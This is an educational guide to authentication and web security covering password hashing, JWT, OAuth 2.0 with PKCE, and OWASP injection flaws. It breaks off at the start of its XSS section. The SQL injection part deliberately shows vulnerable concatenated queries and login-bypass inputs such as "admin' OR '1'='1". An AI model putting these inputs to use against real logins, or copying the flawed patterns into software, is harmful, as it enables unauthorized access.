Security & Authentication

OAuth 2.0, JWT, OWASP Top 10, and Production Security Best Practices

🛡️ EDUCATIONAL SECURITY GUIDE

This page contains intentional examples of security vulnerabilities (XSS, SQL injection, etc.) for educational purposes. All code examples showing attacks are properly escaped and will not execute. If your browser shows security warnings, this is expected - these are teaching examples of what NOT to do in production.

Safe to view: All malicious code is displayed as text within code blocks and cannot execute.

⚠️ Security is NOT Optional:

Every senior engineer must understand authentication, authorization, and common vulnerabilities. A single security flaw can compromise an entire system. This guide covers production-ready security patterns.

1. Authentication vs Authorization

| Aspect | Authentication | Authorization |
| --- | --- | --- |
| Question | Who are you? | What can you do? |
| Purpose | Verify identity | Check permissions |
| Example | Login with username/password | Can user edit this document? |
| Methods | Password, OAuth, Biometric, MFA | RBAC, ABAC, ACLs |
| Happens | First (before authorization) | Second (after authentication) |
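
The ordering in the table can be sketched in a few lines. This is a minimal illustration, not a production design: the session tokens, the `ROLE_PERMISSIONS` mapping, and the `handle_edit` helper are all hypothetical names invented for the example.

```python
from dataclasses import dataclass
from typing import Optional

# Hypothetical in-memory data; a real system would use a user store.
ROLE_PERMISSIONS = {
    "viewer": {"document:read"},
    "editor": {"document:read", "document:edit"},
}


@dataclass(frozen=True)
class User:
    username: str
    role: str


# Hypothetical session table mapping opaque tokens to users.
SESSIONS = {
    "token-alice": User("alice", "editor"),
    "token-bob": User("bob", "viewer"),
}


def authenticate(session_token: str) -> Optional[User]:
    """Authentication: who are you? Returns None for unknown tokens."""
    return SESSIONS.get(session_token)


def authorize(user: User, permission: str) -> bool:
    """Authorization: what can you do? A simple RBAC lookup."""
    return permission in ROLE_PERMISSIONS.get(user.role, set())


def handle_edit(session_token: str) -> int:
    """Return an HTTP-style status code for an edit request."""
    user = authenticate(session_token)
    if user is None:
        return 401  # identity unknown: authentication failed
    if not authorize(user, "document:edit"):
        return 403  # identity known, permission missing
    return 200


print(handle_edit("token-alice"), handle_edit("token-bob"), handle_edit("unknown"))
```

Note the two distinct failure codes: 401 when the caller cannot be identified, 403 when the caller is identified but lacks the permission.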

2. Password Security

2.1 Never Store Plaintext Passwords

❌ NEVER DO THIS:

Storing passwords in plaintext is a critical vulnerability. If your database is compromised, all user accounts are instantly exposed.

import bcrypt
import hashlib
import os

# ❌ BAD - Plaintext password storage
class BadPasswordStorage:
    """NEVER DO THIS - Plaintext passwords"""
    def store_password(self, username, password):
        # Disaster waiting to happen
        db.save(username, password)  # Plaintext!


# ❌ BAD - Simple hashing without salt
class WeakPasswordStorage:
    """NEVER DO THIS - No salt = vulnerable to rainbow tables"""
    def store_password(self, username, password):
        # Vulnerable to rainbow table attacks
        password_hash = hashlib.sha256(password.encode()).hexdigest()
        db.save(username, password_hash)


# ✅ GOOD - Bcrypt with salt (automatic)
class SecurePasswordStorage:
    """
    Use bcrypt for password hashing

    Why bcrypt?
    - Automatic salting (unique salt per password)
    - Adaptive (can increase cost factor as hardware improves)
    - Slow by design (prevents brute force)
    """

    def hash_password(self, password: str) -> bytes:
        """Hash a password using bcrypt"""
        # Generate salt and hash password
        salt = bcrypt.gensalt(rounds=12)  # Cost factor 12
        password_hash = bcrypt.hashpw(password.encode('utf-8'), salt)
        return password_hash

    def verify_password(self, password: str, password_hash: bytes) -> bool:
        """Verify a password against its hash"""
        return bcrypt.checkpw(password.encode('utf-8'), password_hash)


# ✅ GOOD - Argon2 (even better, winner of the Password Hashing Competition)
from argon2 import PasswordHasher
from argon2.exceptions import VerificationError

class Argon2PasswordStorage:
    """
    Argon2 - Modern password hashing (recommended)

    Winner of the Password Hashing Competition (2015)
    Properties:
    - Memory-hard (expensive to crack on GPUs and ASICs)
    - The Argon2id variant (the argon2-cffi default) also resists side-channel attacks
    """

    def __init__(self):
        self.ph = PasswordHasher(
            time_cost=2,       # Number of iterations
            memory_cost=65536, # Memory usage in KiB (64 MiB)
            parallelism=1      # Number of threads
        )

    def hash_password(self, password: str) -> str:
        return self.ph.hash(password)

    def verify_password(self, password: str, password_hash: str) -> bool:
        try:
            self.ph.verify(password_hash, password)
            return True
        except VerificationError:
            # Raised when the password does not match (VerifyMismatchError is a subclass)
            return False


# Usage example
storage = SecurePasswordStorage()

# Registration
password = "SuperSecret123!"
password_hash = storage.hash_password(password)
print(f"Hash: {password_hash}")

# Login
is_valid = storage.verify_password("SuperSecret123!", password_hash)
print(f"Password valid: {is_valid}")  # True

is_valid = storage.verify_password("WrongPassword", password_hash)
print(f"Wrong password: {is_valid}")  # False
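
To see why the unsalted SHA-256 variant above is weak, the following sketch compares it with a salted, iterated hash. It uses PBKDF2 from the standard library purely so the example runs without third-party packages; it stands in for bcrypt or Argon2 here and is not a recommendation over them. The function names and the iteration count are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple


def unsalted_sha256(password: str) -> str:
    """The weak scheme: identical passwords always produce identical hashes."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def salted_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = 100_000) -> Tuple[bytes, bytes]:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). Returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest


def verify(password: str, salt: bytes, expected: bytes,
           iterations: int = 100_000) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, digest = salted_hash(password, salt, iterations)
    return hmac.compare_digest(digest, expected)


# Two users pick the same password.
alice_salt, alice_hash = salted_hash("SuperSecret123!")
bob_salt, bob_hash = salted_hash("SuperSecret123!")

# Unsalted: equal hashes reveal equal passwords and allow precomputed tables.
print(unsalted_sha256("SuperSecret123!") == unsalted_sha256("SuperSecret123!"))
# Salted: each user gets a different hash, so a table must be rebuilt per user.
print(alice_hash == bob_hash)
```

The salt is stored next to the hash; it does not need to be secret, only unique per password.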

2.2 Password Requirements

import re

class PasswordValidator:
    """
    Validate password strength

    Requirements:
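    - Minimum 12 characters (stricter than the 8-character floor in NIST SP 800-63B)
    - At least one uppercase, lowercase, digit, special char
      (a common site policy; NIST SP 800-63B advises against mandatory composition rules)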
    - Not in common password list
    - Not similar to username
    """

    def __init__(self):
        # Load common passwords (e.g., from haveibeenpwned)
        self.common_passwords = self._load_common_passwords()

    def validate_password(self, password: str, username: str = None) -> tuple[bool, list[str]]:
        """
        Validate password strength
        Returns: (is_valid, list_of_errors)
        """
        errors = []

        # Length check
        if len(password) < 12:
            errors.append("Password must be at least 12 characters")

        # Complexity checks
        if not re.search(r'[A-Z]', password):
            errors.append("Password must contain uppercase letter")

        if not re.search(r'[a-z]', password):
            errors.append("Password must contain lowercase letter")

        if not re.search(r'\d', password):
            errors.append("Password must contain digit")

        if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
            errors.append("Password must contain special character")

        # Common password check
        if password.lower() in self.common_passwords:
            errors.append("Password is too common")

        # Username similarity check
        if username and username.lower() in password.lower():
            errors.append("Password cannot contain username")

        return (len(errors) == 0, errors)

    def _load_common_passwords(self) -> set:
        """Load common passwords from file or API"""
        # In production, load from file or API
        return {
            'password', 'password123', '123456', 'qwerty',
            'letmein', 'welcome', 'admin', 'root'
        }


# Usage
validator = PasswordValidator()
is_valid, errors = validator.validate_password("Pass123!", "john")
if not is_valid:
    print("Password errors:")
    for error in errors:
        print(f"  - {error}")
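
The validator above mentions loading common passwords from haveibeenpwned. One way to check a password against that kind of breach corpus without sending the password itself is a k-anonymity lookup: hash locally with SHA-1, send only the first five hex characters, and compare the returned suffixes locally. The sketch below covers only the local steps; the response text is a made-up sample in the `SUFFIX:COUNT` line format, and the function names are hypothetical.

```python
import hashlib
from typing import Tuple


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Split the uppercase SHA-1 hex digest into a 5-char prefix and 35-char suffix."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def breach_count(suffix: str, range_response: str) -> int:
    """Look up our suffix in a 'SUFFIX:COUNT' response body; 0 if absent."""
    for line in range_response.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0


prefix, suffix = sha1_prefix_suffix("password")

# Hypothetical response body for this prefix; the counts are invented.
sample_response = (
    "0018A45C4D1DEF81644B54AB7F969B88D65:3\n"
    f"{suffix}:12345\n"
)

print(prefix)  # only these five characters would leave the machine
print(breach_count(suffix, sample_response) > 0)
```

Only the prefix is ever transmitted, so the service cannot tell which of the many matching passwords was checked.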

3. JSON Web Tokens (JWT)

3.1 JWT Structure

JWT Format: header.payload.signature
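
The three dot-separated parts can be built and checked by hand with the standard library. This is a teaching sketch for HS256 only, with hypothetical helper names; in an application a maintained library such as PyJWT should do this work.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    """Base64url without padding, as used in JWT segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Restore the stripped padding before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Build header.payload.signature with an HMAC-SHA256 signature."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, payload)
    )
    signature = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(signature)}"


def split_and_verify(token: str, secret: bytes) -> dict:
    """Split the token, check the algorithm and signature, return the payload."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    expected = hmac.new(
        secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, b64url_decode(signature_b64)):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_b64))


secret = b"k" * 32  # placeholder key for the example only
token = sign_hs256({"user_id": 123, "type": "access"}, secret)
print(token.count("."))  # two dots separate the three parts
print(split_and_verify(token, secret))
```

The header and payload are only encoded, not encrypted: anyone holding the token can read them, so the payload must never carry secrets.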

3.2 JWT Authentication Flow

sequenceDiagram
    participant Client
    participant Server
    participant Database

    Note over Client,Database: Initial Login
    Client->>+Server: POST /login<br/>{username, password}
    Server->>+Database: Verify credentials
    Database-->>-Server: User found ✓
    Note over Server: 1. Create JWT Token<br/>2. Sign with secret key<br/>3. Set expiration
    Server-->>-Client: 200 OK<br/>{access_token, refresh_token}
    Note over Client: Store tokens<br/>(localStorage/memory)

    Note over Client,Database: Authenticated API Request
    Client->>+Server: GET /api/protected<br/>Authorization: Bearer {JWT}
    Note over Server: 1. Extract JWT from header<br/>2. Verify signature<br/>3. Check expiration<br/>4. Extract user claims
    alt Token Valid
        Server->>+Database: Fetch user resources
        Database-->>-Server: Resources
        Server-->>Client: 200 OK<br/>{data}
    else Token Invalid/Expired
        Server-->>Client: 401 Unauthorized<br/>{error: "Invalid token"}
    end

    Note over Client,Database: Token Refresh
    Client->>+Server: POST /refresh<br/>{refresh_token}
    Note over Server: 1. Verify refresh token<br/>2. Check if blacklisted<br/>3. Issue new access token
    Server-->>-Client: 200 OK<br/>{new_access_token}

    Note over Client,Database: Logout
    Client->>+Server: POST /logout<br/>{refresh_token}
    Note over Server: Add refresh token<br/>to blacklist
    Server->>+Database: Blacklist token
    Database-->>-Server: Token blacklisted ✓
    Server-->>-Client: 200 OK
    Note over Client: Clear local tokens
Security Best Practices:
import jwt
import datetime
from typing import Dict, Optional

class JWTManager:
    """
    JWT token management for authentication

    Use cases:
    - Stateless authentication
    - API authentication
    - Single Sign-On (SSO)

    Security considerations:
    - Use strong secret keys (256+ bits)
    - Set short expiration times
    - Implement token refresh mechanism
    - Store secrets in environment variables
    - Use HTTPS only
    """

    def __init__(self, secret_key: str, algorithm: str = 'HS256'):
        self.secret_key = secret_key
        self.algorithm = algorithm
        self.access_token_expiry = datetime.timedelta(minutes=15)  # Short-lived
        self.refresh_token_expiry = datetime.timedelta(days=7)     # Long-lived

    def create_access_token(self, user_id: int, email: str, roles: list = None) -> str:
        """
        Create short-lived access token

        Access tokens:
        - Short expiration (15 minutes typical)
        - Contains user identity and permissions
        - Used for API requests
        """
        payload = {
            'user_id': user_id,
            'email': email,
            'roles': roles or [],
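            # Timezone-aware UTC timestamps (datetime.utcnow() is deprecated since Python 3.12)
            'exp': datetime.datetime.now(datetime.timezone.utc) + self.access_token_expiry,
            'iat': datetime.datetime.now(datetime.timezone.utc),  # Issued at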
            'type': 'access'
        }

        token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
        return token

    def create_refresh_token(self, user_id: int) -> str:
        """
        Create long-lived refresh token

        Refresh tokens:
        - Longer expiration (7 days typical)
        - Only used to get new access tokens
        - Should be stored securely (httpOnly cookie)
        - Can be revoked (store in DB)
        """
        payload = {
            'user_id': user_id,
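            # Timezone-aware UTC timestamps (datetime.utcnow() is deprecated since Python 3.12)
            'exp': datetime.datetime.now(datetime.timezone.utc) + self.refresh_token_expiry,
            'iat': datetime.datetime.now(datetime.timezone.utc),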
            'type': 'refresh'
        }

        token = jwt.encode(payload, self.secret_key, algorithm=self.algorithm)
        return token

    def verify_token(self, token: str, token_type: str = 'access') -> Optional[Dict]:
        """
        Verify and decode JWT token

        Returns payload if valid, None if invalid
        """
        try:
            payload = jwt.decode(
                token,
                self.secret_key,
                algorithms=[self.algorithm]
            )

            # Verify token type
            if payload.get('type') != token_type:
                return None

            return payload

        except jwt.ExpiredSignatureError:
            print("Token expired")
            return None
        except jwt.InvalidTokenError:
            print("Invalid token")
            return None

    def refresh_access_token(self, refresh_token: str) -> Optional[str]:
        """
        Use refresh token to get new access token
        """
        payload = self.verify_token(refresh_token, token_type='refresh')

        if not payload:
            return None

        # In production, check if refresh token is revoked (DB lookup)
        # if is_token_revoked(refresh_token):
        #     return None

        # Create new access token
        user_id = payload['user_id']
        # Fetch user from DB to get current roles
        # user = db.get_user(user_id)

        return self.create_access_token(
            user_id=user_id,
            email="user@example.com",  # Placeholder: fetch from DB
            roles=["user"]              # Placeholder: fetch from DB, never hardcode elevated roles
        )


# Usage example
jwt_manager = JWTManager(secret_key="your-secret-key-min-256-bits")

# Login - create tokens
access_token = jwt_manager.create_access_token(
    user_id=123,
    email="john@example.com",
    roles=["user", "admin"]
)
refresh_token = jwt_manager.create_refresh_token(user_id=123)

print(f"Access token: {access_token[:50]}...")
print(f"Refresh token: {refresh_token[:50]}...")

# API request - verify access token
payload = jwt_manager.verify_token(access_token)
if payload:
    print(f"Authenticated user: {payload['email']}")
    print(f"Roles: {payload['roles']}")

# Access token expired - use refresh token
new_access_token = jwt_manager.refresh_access_token(refresh_token)
if new_access_token:
    print("New access token issued")
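
The logout and refresh steps in the flow depend on being able to revoke a refresh token, which the JWTManager above leaves as a commented-out check. A minimal in-memory sketch of that piece follows. It assumes each refresh token carries a unique `jti` (JWT ID) claim, which the payloads above do not yet set, and the `RefreshTokenStore` class is a hypothetical helper; a real deployment would keep this state in a shared store such as a database.

```python
import secrets
import time
from typing import Dict, Optional


class RefreshTokenStore:
    """Tracks revoked refresh-token IDs until the tokens would expire anyway."""

    def __init__(self) -> None:
        self._revoked: Dict[str, float] = {}  # jti -> token expiry (Unix time)

    @staticmethod
    def new_jti() -> str:
        """Generate an unguessable token ID to put in the 'jti' claim."""
        return secrets.token_urlsafe(16)

    def revoke(self, jti: str, expires_at: float) -> None:
        """Called on logout: remember the ID until the token's own expiry."""
        self._revoked[jti] = expires_at

    def is_revoked(self, jti: str, now: Optional[float] = None) -> bool:
        """Called on refresh, after the signature and expiry checks pass."""
        now = time.time() if now is None else now
        # Drop entries for tokens that have expired; they fail validation anyway.
        self._revoked = {j: exp for j, exp in self._revoked.items() if exp > now}
        return jti in self._revoked


store = RefreshTokenStore()
jti = store.new_jti()
print(store.is_revoked(jti))          # not revoked yet
store.revoke(jti, expires_at=time.time() + 7 * 24 * 3600)
print(store.is_revoked(jti))          # revoked after logout
```

Storing only the `jti` and expiry keeps the list small, since entries can be purged once the token could no longer be used.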

3.3 JWT Security Best Practices

JWT Security Checklist:

4. OAuth 2.0

4.1 OAuth 2.0 Flows

| Flow | Use Case | Tokens | Security |
| --- | --- | --- | --- |
| Authorization Code | Web apps with backend | Access + Refresh | Most secure (with PKCE) |
| Client Credentials | Machine-to-machine (M2M) | Access only | Secure (no user context) |
| Implicit | ❌ Deprecated (SPAs) | Access only | Insecure (token in URL) |
| Password | ❌ Deprecated (legacy) | Access + Refresh | Low (shares password) |
| Auth Code + PKCE | SPAs, Mobile apps | Access + Refresh | Secure (modern standard) |

4.2 Authorization Code Flow Implementation

from flask import Flask, request, redirect, session, url_for
import requests
import secrets
import hashlib
import base64

app = Flask(__name__)
app.secret_key = secrets.token_hex(32)

class OAuth2Client:
    """
    OAuth 2.0 Authorization Code Flow with PKCE

    Flow:
    1. Generate code verifier & challenge (PKCE)
    2. Redirect user to authorization server
    3. User authenticates and approves
    4. Receive authorization code
    5. Exchange code for access token (with verifier)
    6. Use access token to access resources

    PKCE (Proof Key for Code Exchange):
    - Prevents authorization code interception
    - Required for public clients (SPAs, mobile)
    - Recommended for all OAuth clients
    """

    def __init__(self, client_id: str, client_secret: str,
                 auth_url: str, token_url: str, redirect_uri: str):
        self.client_id = client_id
        self.client_secret = client_secret
        self.auth_url = auth_url
        self.token_url = token_url
        self.redirect_uri = redirect_uri

    def generate_pkce_pair(self) -> tuple[str, str]:
        """
        Generate PKCE code verifier and challenge

        Verifier: Random string (43-128 chars)
        Challenge: SHA256(verifier), base64 encoded
        """
        # Generate code verifier (random string)
        code_verifier = base64.urlsafe_b64encode(
            secrets.token_bytes(32)
        ).decode('utf-8').rstrip('=')

        # Generate code challenge (SHA256 of verifier)
        challenge = hashlib.sha256(code_verifier.encode('utf-8')).digest()
        code_challenge = base64.urlsafe_b64encode(challenge).decode('utf-8').rstrip('=')

        return code_verifier, code_challenge

    def get_authorization_url(self, state: str, code_challenge: str) -> str:
        """
        Build authorization URL

        Parameters:
        - response_type: 'code' for authorization code flow
        - client_id: Your application's ID
        - redirect_uri: Where to send user after auth
        - scope: Permissions requested
        - state: CSRF protection token
        - code_challenge: PKCE challenge
        - code_challenge_method: 'S256' (SHA256)
        """
        params = {
            'response_type': 'code',
            'client_id': self.client_id,
            'redirect_uri': self.redirect_uri,
            'scope': 'openid profile email',
            'state': state,
            'code_challenge': code_challenge,
            'code_challenge_method': 'S256'
        }

        # URL-encode the values: the scope contains spaces and
        # redirect_uri contains ':' and '/' characters
        from urllib.parse import urlencode
        return f"{self.auth_url}?{urlencode(params)}"

    def exchange_code_for_token(self, code: str, code_verifier: str) -> dict:
        """
        Exchange authorization code for access token

        POST to token endpoint with:
        - grant_type: 'authorization_code'
        - code: Authorization code received
        - redirect_uri: Must match original
        - client_id: Your application ID
        - code_verifier: PKCE verifier
        """
        data = {
            'grant_type': 'authorization_code',
            'code': code,
            'redirect_uri': self.redirect_uri,
            'client_id': self.client_id,
            'code_verifier': code_verifier
        }

        # For confidential clients, include client_secret
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        # Client authentication (Basic Auth)
        auth = (self.client_id, self.client_secret)

        response = requests.post(
            self.token_url,
            data=data,
            headers=headers,
            auth=auth
        )

        if response.status_code == 200:
            return response.json()
        else:
            raise Exception(f"Token exchange failed: {response.text}")

    def refresh_access_token(self, refresh_token: str) -> dict:
        """
        Use refresh token to get new access token
        """
        data = {
            'grant_type': 'refresh_token',
            'refresh_token': refresh_token,
            'client_id': self.client_id
        }

        auth = (self.client_id, self.client_secret)

        response = requests.post(
            self.token_url,
            data=data,
            auth=auth
        )

        if response.status_code == 200:
            return response.json()
        else:
            raise Exception(f"Token refresh failed: {response.text}")


# Flask routes implementing OAuth flow
oauth_client = OAuth2Client(
    client_id="your-client-id",
    client_secret="your-client-secret",
    auth_url="https://provider.com/oauth/authorize",
    token_url="https://provider.com/oauth/token",
    redirect_uri="http://localhost:5000/callback"
)

@app.route('/login')
def login():
    """
    Initiate OAuth flow
    """
    # Generate PKCE pair
    code_verifier, code_challenge = oauth_client.generate_pkce_pair()

    # Generate state for CSRF protection
    state = secrets.token_hex(16)

    # Store in session (Flask's default session is a signed cookie:
    # tamper-evident, but readable by the client)
    session['oauth_state'] = state
    session['code_verifier'] = code_verifier

    # Redirect to authorization server
    auth_url = oauth_client.get_authorization_url(state, code_challenge)
    return redirect(auth_url)


@app.route('/callback')
def callback():
    """
    Handle OAuth callback
    """
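    # Verify state (CSRF protection); reject if either value is missing,
    # otherwise None == None would pass the check
    state = request.args.get('state')
    expected_state = session.get('oauth_state')
    if not state or not expected_state or not secrets.compare_digest(
            state.encode('utf-8'), expected_state.encode('utf-8')):
        return "Invalid state parameter", 400

    # Get authorization code
    code = request.args.get('code')
    if not code:
        # Do not echo the 'error' query parameter back: it is
        # attacker-controlled and would be rendered as HTML
        app.logger.warning("Authorization failed: %r", request.args.get('error'))
        return "Authorization failed", 400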

    # Exchange code for token
    code_verifier = session.get('code_verifier')
    try:
        token_response = oauth_client.exchange_code_for_token(code, code_verifier)

        # Store tokens (in production use a server-side session store:
        # the default cookie session is signed but not encrypted)
        session['access_token'] = token_response['access_token']
        session['refresh_token'] = token_response.get('refresh_token')

        # Clear PKCE values
        session.pop('oauth_state', None)
        session.pop('code_verifier', None)

        return "Login successful!"

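    except Exception:
        # Log details server-side; do not send the provider's error body to the browser
        app.logger.exception("Token exchange failed")
        return "Token exchange failed", 500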


@app.route('/api/protected')
def protected_resource():
    """
    Access protected resource with access token
    """
    access_token = session.get('access_token')
    if not access_token:
        return "Unauthorized", 401

    # Use access token to call API
    headers = {'Authorization': f'Bearer {access_token}'}
    response = requests.get('https://api.provider.com/user', headers=headers)

    if response.status_code == 401:
        # Token expired, try refresh
        refresh_token = session.get('refresh_token')
        if refresh_token:
            try:
                new_tokens = oauth_client.refresh_access_token(refresh_token)
                session['access_token'] = new_tokens['access_token']
                # Retry request
                headers = {'Authorization': f'Bearer {new_tokens["access_token"]}'}
                response = requests.get('https://api.provider.com/user', headers=headers)
            except Exception:
                return "Session expired, please login again", 401

    return response.json()
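
The client code above generates the PKCE pair; the other half of the mechanism is the check the authorization server performs at the token endpoint. The sketch below shows that check for the S256 method. The function names are hypothetical, and the sample values are the example verifier and challenge published in RFC 7636, Appendix B.

```python
import base64
import hashlib
import hmac


def s256_challenge(code_verifier: str) -> str:
    """code_challenge = BASE64URL(SHA256(ASCII(code_verifier))), without padding."""
    digest = hashlib.sha256(code_verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def verify_pkce(code_verifier: str, stored_challenge: str) -> bool:
    """Server-side check: does the verifier sent with the code match the
    challenge that was stored when the authorization request was made?"""
    if not 43 <= len(code_verifier) <= 128:
        return False  # length limits from the PKCE specification
    try:
        computed = s256_challenge(code_verifier)
    except UnicodeEncodeError:
        return False  # verifiers are restricted to ASCII characters
    return hmac.compare_digest(computed.encode("utf-8"), stored_challenge.encode("utf-8"))


# Example pair from RFC 7636, Appendix B.
verifier = "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk"
challenge = "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM"

print(verify_pkce(verifier, challenge))
print(verify_pkce("x" * 43, challenge))
```

An attacker who intercepts the authorization code sees only the challenge, and cannot derive the verifier needed to redeem the code.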

4.3 OAuth 2.0 vs OpenID Connect

| Feature | OAuth 2.0 | OpenID Connect (OIDC) |
| --- | --- | --- |
| Purpose | Authorization | Authentication + Authorization |
| Use Case | API access delegation | User login (SSO) |
| Tokens | Access token (opaque) | Access + ID token (JWT) |
| User Info | Not standardized | Standard claims in ID token |
| Examples | GitHub API access | Google Sign-In, "Login with Facebook" |

OpenID Connect = OAuth 2.0 + Identity Layer

OIDC adds an ID token (JWT) that contains user identity information (name, email, etc.). The ID token is for the client, the access token is for the API.
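
Because the ID token is addressed to the client, the client is responsible for checking its claims before trusting the identity in it. The sketch below covers only the claim checks and assumes the token's signature has already been verified against the provider's keys by a JWT library. The claim names (`iss`, `aud`, `exp`, `nonce`, `sub`) are the standard ones; the function name, issuer URL, and client ID are made up for the example.

```python
import time
from typing import List, Optional


def validate_id_token_claims(claims: dict, issuer: str, client_id: str,
                             nonce: Optional[str] = None,
                             now: Optional[float] = None,
                             leeway: int = 60) -> List[str]:
    """Return a list of problems; an empty list means the claims look acceptable."""
    now = time.time() if now is None else now
    errors = []
    if claims.get("iss") != issuer:
        errors.append("iss does not match the expected issuer")
    aud = claims.get("aud")
    audiences = [aud] if isinstance(aud, str) else list(aud or [])
    if client_id not in audiences:
        errors.append("aud does not include this client")
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp + leeway < now:
        errors.append("exp is missing or in the past")
    if nonce is not None and claims.get("nonce") != nonce:
        errors.append("nonce does not match the login request")
    if not claims.get("sub"):
        errors.append("sub (subject) is missing")
    return errors


# Hypothetical decoded ID token payload.
claims = {
    "iss": "https://provider.example",
    "aud": "your-client-id",
    "sub": "user-42",
    "exp": 2_000,
    "nonce": "n-123",
}
print(validate_id_token_claims(claims, "https://provider.example",
                               "your-client-id", nonce="n-123", now=1_000))
```

The audience check is what stops a token issued to a different application from being replayed against this one.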

5. OWASP Top 10 Web Application Vulnerabilities

5.1 Injection Attacks

SQL Injection (Injection is A03 in the OWASP Top 10 2021)

Risk: Attackers can execute arbitrary SQL commands, read/modify/delete data, or gain admin access.

import sqlite3
import psycopg2
from typing import Optional

# ❌ VULNERABLE - SQL Injection
class VulnerableUserDB:
    """NEVER DO THIS - String concatenation with user input"""

    def get_user(self, username: str) -> Optional[dict]:
        # VULNERABLE: Attacker can inject SQL
        # Input: "admin' OR '1'='1" bypasses authentication
        query = f"SELECT * FROM users WHERE username = '{username}'"
        cursor = self.conn.execute(query)
        return cursor.fetchone()

    def login(self, username: str, password: str) -> bool:
        # VULNERABLE: SQL injection
        # Input: username="admin' --" ignores password check
        query = f"""
            SELECT * FROM users
            WHERE username = '{username}' AND password = '{password}'
        """
        cursor = self.conn.execute(query)
        return cursor.fetchone() is not None


# ✅ SECURE - Parameterized queries
class SecureUserDB:
    """
    Always use parameterized queries / prepared statements

    The driver passes values separately from the SQL text (bound parameters),
    so user input is never parsed as SQL, which prevents SQL injection
    """

    def __init__(self, db_path: str):
        self.conn = sqlite3.connect(db_path)

    def get_user(self, username: str) -> Optional[dict]:
        """Safe: Uses parameterized query"""
        query = "SELECT * FROM users WHERE username = ?"
        cursor = self.conn.execute(query, (username,))
        return cursor.fetchone()

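    def login(self, username: str, password_hash: str) -> bool:
        """
        Safe from injection: parameterized query with placeholders

        Note: comparing hashes in SQL only works for unsalted hashes. With
        bcrypt or Argon2 (section 2.1), fetch the stored hash by username
        and verify the password in application code instead.
        """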
        query = """
            SELECT * FROM users
            WHERE username = ? AND password_hash = ?
        """
        cursor = self.conn.execute(query, (username, password_hash))
        return cursor.fetchone() is not None

    def search_users(self, search_term: str) -> list:
        """Safe: Even with LIKE, use parameters"""
        query = "SELECT * FROM users WHERE name LIKE ?"
        cursor = self.conn.execute(query, (f'%{search_term}%',))
        return cursor.fetchall()


# ✅ SECURE - ORM (SQLAlchemy)
from sqlalchemy import create_engine, Column, Integer, String
# declarative_base lives in sqlalchemy.orm since SQLAlchemy 1.4
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class User(Base):
    __tablename__ = 'users'
    id = Column(Integer, primary_key=True)
    username = Column(String, unique=True)
    password_hash = Column(String)

class SecureUserORM:
    """
    ORMs automatically use parameterized queries

    SQLAlchemy, Django ORM, etc. protect against SQL injection
    """

    def __init__(self, db_url: str):
        engine = create_engine(db_url)
        Session = sessionmaker(bind=engine)
        self.session = Session()

    def get_user(self, username: str) -> Optional[User]:
        """Safe: ORM uses parameters"""
        return self.session.query(User).filter(User.username == username).first()

    def search_users(self, search_term: str) -> list:
        """Safe: Even with LIKE"""
        return self.session.query(User).filter(
            User.username.like(f'%{search_term}%')
        ).all()


# Demonstrating the vulnerability
print("=== SQL Injection Example ===")
print("Malicious input: admin' OR '1'='1")
print("Resulting query: SELECT * FROM users WHERE username = 'admin' OR '1'='1'")
print("Effect: Returns all users (bypasses authentication)")
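
The difference between the two approaches can be observed directly with an in-memory SQLite database. This is a self-contained sketch; the table layout and sample rows are invented for the demonstration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)"
)
conn.executemany(
    "INSERT INTO users (username, is_admin) VALUES (?, ?)",
    [("admin", 1), ("alice", 0), ("bob", 0)],
)

malicious = "nobody' OR '1'='1"

# Vulnerable: the input becomes part of the SQL text, so the OR clause
# is parsed as SQL and matches every row.
vulnerable_rows = conn.execute(
    f"SELECT username FROM users WHERE username = '{malicious}'"
).fetchall()

# Safe: the input is bound as a value, so it is compared literally
# against the username column and matches nothing.
safe_rows = conn.execute(
    "SELECT username FROM users WHERE username = ?", (malicious,)
).fetchall()

print(len(vulnerable_rows))  # 3
print(len(safe_rows))        # 0
```

The same input that returns the whole table through string formatting returns nothing through a bound parameter, because no user named `nobody' OR '1'='1` exists.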

5.2 Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) (A7 in the OWASP Top 10 2017; part of A03 Injection in the 2021 list)

Risk: Attackers inject malicious scripts that execute in victims' browsers, stealing cookies, session tokens, or performing actions as the user.

from flask import Flask, render_template_string, request
from markupsafe import Markup, escape  # flask.escape was removed in Flask 2.3
import bleach

app = Flask(__name__)

